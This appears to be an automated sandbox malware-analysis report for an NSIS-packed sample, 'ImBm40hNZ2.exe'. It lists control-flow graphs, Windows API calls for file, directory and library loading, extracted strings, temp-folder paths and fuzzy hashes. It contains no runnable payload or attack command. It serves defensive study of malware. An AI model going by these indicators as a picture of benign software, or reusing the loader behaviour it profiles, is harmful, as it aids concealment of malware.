                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 184 402c29-402c77 GetTickCount GetModuleFileNameA call 405822 187 402c83-402cb1 call 405b91 call 405668 call 405b91 GetFileSize 184->187 188 402c79-402c7e 184->188 196 402cb7 187->196 197 402d9e-402dac call 402bc5 187->197 189 402e5b-402e5f 188->189 199 402cbc-402cd3 196->199 203 402e01-402e06 197->203 204 402dae-402db1 197->204 201 402cd5 199->201 202 402cd7-402ce0 call 403081 199->202 201->202 210 402ce6-402ced 202->210 211 402e08-402e10 call 402bc5 202->211 203->189 206 402db3-402dcb call 403097 call 403081 204->206 207 402dd5-402dff GlobalAlloc call 403097 call 402e62 204->207 206->203 232 402dcd-402dd3 206->232 207->203 231 402e12-402e23 207->231 215 402d69-402d6d 210->215 216 402cef-402d03 call 4057dd 210->216 211->203 220 402d77-402d7d 215->220 221 402d6f-402d76 call 402bc5 215->221 216->220 235 402d05-402d0c 216->235 226 402d8c-402d96 220->226 227 402d7f-402d89 call 405f2e 220->227 221->220 226->199 230 402d9c 226->230 227->226 230->197 236 402e25 231->236 237 402e2b-402e30 231->237 232->203 232->207 235->220 239 402d0e-402d15 235->239 236->237 241 402e31-402e37 237->241 239->220 240 402d17-402d1e 239->240 240->220 242 402d20-402d27 240->242 241->241 243 402e39-402e54 SetFilePointer call 4057dd 241->243 242->220 244 402d29-402d49 242->244 247 402e59 243->247 244->203 246 402d4f-402d53 244->246 248 402d55-402d59 246->248 249 402d5b-402d63 246->249 247->189 248->230 248->249 249->220 250 402d65-402d67 249->250 250->220
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C3A
                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ImBm40hNZ2.exe,00000400), ref: 00402C56
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00402CA2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
                                                                                                                                                                                                                                                                • Null, xrefs: 00402D20
                                                                                                                                                                                                                                                                • Inst, xrefs: 00402D0E
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C33
                                                                                                                                                                                                                                                                • soft, xrefs: 00402D17
                                                                                                                                                                                                                                                                • "C:\Users\user\Desktop\ImBm40hNZ2.exe", xrefs: 00402C29
                                                                                                                                                                                                                                                                • C:\Users\user\Desktop\ImBm40hNZ2.exe, xrefs: 00402C40, 00402C4F, 00402C63, 00402C83
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00402C79
                                                                                                                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 00402C84, 00402C89, 00402C8F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ImBm40hNZ2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-246767907
                                                                                                                                                                                                                                                                • Opcode ID: 5fd613f8535001b2fdd8dcc1512c25ec0cd79592a89078802bb2e0adc6ce6401
                                                                                                                                                                                                                                                                • Instruction ID: c80feb63f856711914d44cd07d0e36175ef9d189e1e49feff23a0d5b70f6312c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd613f8535001b2fdd8dcc1512c25ec0cd79592a89078802bb2e0adc6ce6401
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51D331A00214ABDB209F65DE89B9E7AB4AB04719F10413BF905B72D1D7BC9D818BAD
                                                                                                                                                                                                                                                                Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 382 40173f-401762 call 4029fd call 40568e 387 401764-40176a call 405b91 382->387 388 40176c-40177e call 405b91 call 405621 lstrcatA 382->388 393 401783-401789 call 405dfc 387->393 388->393 398 40178e-401792 393->398 399 401794-40179e call 405e95 398->399 400 4017c5-4017c8 398->400 407 4017b0-4017c2 399->407 408 4017a0-4017ae CompareFileTime 399->408 401 4017d0-4017ec call 405822 400->401 402 4017ca-4017cb call 4057fd 400->402 410 401864-40188d call 404e7c call 402e62 401->410 411 4017ee-4017f1 401->411 402->401 407->400 408->407 423 401895-4018a1 SetFileTime 410->423 424 40188f-401893 410->424 412 4017f3-401835 call 405b91 * 2 call 405bb3 call 405b91 call 4053a5 411->412 413 401846-401850 call 404e7c 411->413 412->398 445 40183b-40183c 412->445 425 401859-40185f 413->425 427 4018a7-4018b2 CloseHandle 423->427 424->423 424->427 428 40289b 425->428 430 402892-402895 427->430 431 4018b8-4018bb 427->431 432 40289d-4028a1 428->432 430->428 435 4018d0-4018d3 call 405bb3 431->435 436 4018bd-4018ce call 405bb3 lstrcatA 431->436 442 4018d8-40222b call 4053a5 435->442 436->442 442->432 445->425 447 40183e-40183f 445->447 447->413
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 0040177E
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,00000031), ref: 004017A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp$C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll$Call
                                                                                                                                                                                                                                                                • API String ID: 1941528284-1413993741
                                                                                                                                                                                                                                                                • Opcode ID: acad959dcb61790d49c9f598584ac5e86f9d1ccebe4d7eba3cd078971f6b2a85
                                                                                                                                                                                                                                                                • Instruction ID: 4c0a073a0a50a016330575191a1a6545d3ec5be94f2f3c544cdbcd56c7493ec8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acad959dcb61790d49c9f598584ac5e86f9d1ccebe4d7eba3cd078971f6b2a85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A941C371900515BADF10BBA9DC46DAF3679DF05368B20423BF421F20E2D77C5A419AAD
                                                                                                                                                                                                                                                                Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 449 402e62-402e78 450 402e81-402e89 449->450 451 402e7a 449->451 452 402e92-402e97 450->452 453 402e8b 450->453 451->450 454 402ea7-402eb4 call 403081 452->454 455 402e99-402ea2 call 403097 452->455 453->452 459 402eba-402ebe 454->459 460 40302e 454->460 455->454 461 402ec4-402f0b GetTickCount 459->461 462 403017-403019 459->462 463 403030-403031 460->463 466 402f11-402f19 461->466 467 403077 461->467 464 40301b-40301e 462->464 465 40306d-403070 462->465 468 40307a-40307e 463->468 471 403020 464->471 472 403023-40302c call 403081 464->472 469 403072 465->469 470 403033-403039 465->470 473 402f1b 466->473 474 402f1e-402f2c call 403081 466->474 467->468 469->467 477 40303b 470->477 478 40303e-40304c call 403081 470->478 471->472 472->460 482 403074 472->482 473->474 474->460 483 402f32-402f3b 474->483 477->478 478->460 486 40304e-403060 WriteFile 478->486 482->467 485 402f41-402f61 call 405f9c 483->485 492 402f67-402f7a GetTickCount 485->492 493 40300f-403011 485->493 488 403062-403065 486->488 489 403013-403015 486->489 488->489 491 403067-40306a 488->491 489->463 491->465 494 402f7c-402f84 492->494 495 402fbf-402fc3 492->495 493->463 498 402f86-402f8a 494->498 499 402f8c-402fbc MulDiv wsprintfA call 404e7c 494->499 496 403004-403007 495->496 497 402fc5-402fc8 495->497 496->466 503 40300d 496->503 501 402fea-402ff5 497->501 502 402fca-402fde WriteFile 497->502 498->495 498->499 499->495 506 402ff8-402ffc 501->506 502->489 505 402fe0-402fe3 502->505 503->467 505->489 507 402fe5-402fe8 505->507 506->485 508 403002 506->508 507->506 508->467
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ECA
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402F6F
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402FA8
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041AFD0,7FFFFFFF,00000000), ref: 00402FD6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                                                                                                • API String ID: 4209647438-2449383134
                                                                                                                                                                                                                                                                • Opcode ID: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
                                                                                                                                                                                                                                                                • Instruction ID: 6a3fda1890073d0766cfbb54329871e7c274013a7bb5ca031e3128d44e3cc29a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F619D7190121A9BCF10DFA5DA44AAE7BBCAF40395F14413BF811B72D4C3789E50DBAA
                                                                                                                                                                                                                                                                Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401D29
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                                                • String ID: Tahoma
                                                                                                                                                                                                                                                                • API String ID: 3808545654-3580928618
                                                                                                                                                                                                                                                                • Opcode ID: dd809f51fe667c0022c2dc729780a904305d67f997212ff511212824b15b7b7a
                                                                                                                                                                                                                                                                • Instruction ID: 2cbf7b26bffa346353c04d8a5f9262401d36b0fa9ffcbdeb30b58970b6715d39
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd809f51fe667c0022c2dc729780a904305d67f997212ff511212824b15b7b7a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46018671955380AFEB019BB0AF0AB9A3FB4E715705F20843AF141BB2E2C5B95411DB2F
                                                                                                                                                                                                                                                                Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 523 401f68-401f74 524 401f7a-401f90 call 4029fd * 2 523->524 525 40202f-402031 523->525 534 401f92-401f9d GetModuleHandleA 524->534 535 401f9f-401fad LoadLibraryExA 524->535 526 40217c-402181 call 401423 525->526 533 402892-4028a1 526->533 534->535 537 401faf-401fbc GetProcAddress 534->537 535->537 538 402028-40202a 535->538 540 401ffb-402000 call 404e7c 537->540 541 401fbe-401fc4 537->541 538->526 545 402005-402008 540->545 543 401fc6-401fd2 call 401423 541->543 544 401fdd-401ff4 call 100016da 541->544 543->545 554 401fd4-401fdb 543->554 549 401ff6-401ff9 544->549 545->533 547 40200e-402016 call 4035ba 545->547 547->533 553 40201c-402023 FreeLibrary 547->553 549->545 553->533 554->545
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                                                                                • API String ID: 2987980305-2386870291
                                                                                                                                                                                                                                                                • Opcode ID: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
                                                                                                                                                                                                                                                                • Instruction ID: c9057b5ece4bb598837aab6aa7fd84f94fd7ed62459683fea6a67aa899d5519e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B212B32904215F7DB107FA5CE4DA6E39B0AB48358F70823BF600B62D0DBBC4D419A6E
                                                                                                                                                                                                                                                                Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 582 4015b3-4015c6 call 4029fd call 4056ba 587 4015c8-4015e3 call 40564c CreateDirectoryA 582->587 588 40160a-40160d 582->588 595 401600-401608 587->595 596 4015e5-4015f0 GetLastError 587->596 590 401638-402181 call 401423 588->590 591 40160f-40162a call 401423 call 405b91 SetCurrentDirectoryA 588->591 603 402892-4028a1 590->603 591->603 606 401630-401633 591->606 595->587 595->588 599 4015f2-4015fb GetFileAttributesA 596->599 600 4015fd 596->600 599->595 599->600 600->595 606->603
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004056C8
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
                                                                                                                                                                                                                                                                  • Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 00401617
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
                                                                                                                                                                                                                                                                • API String ID: 3751793516-378292206
                                                                                                                                                                                                                                                                • Opcode ID: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
                                                                                                                                                                                                                                                                • Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
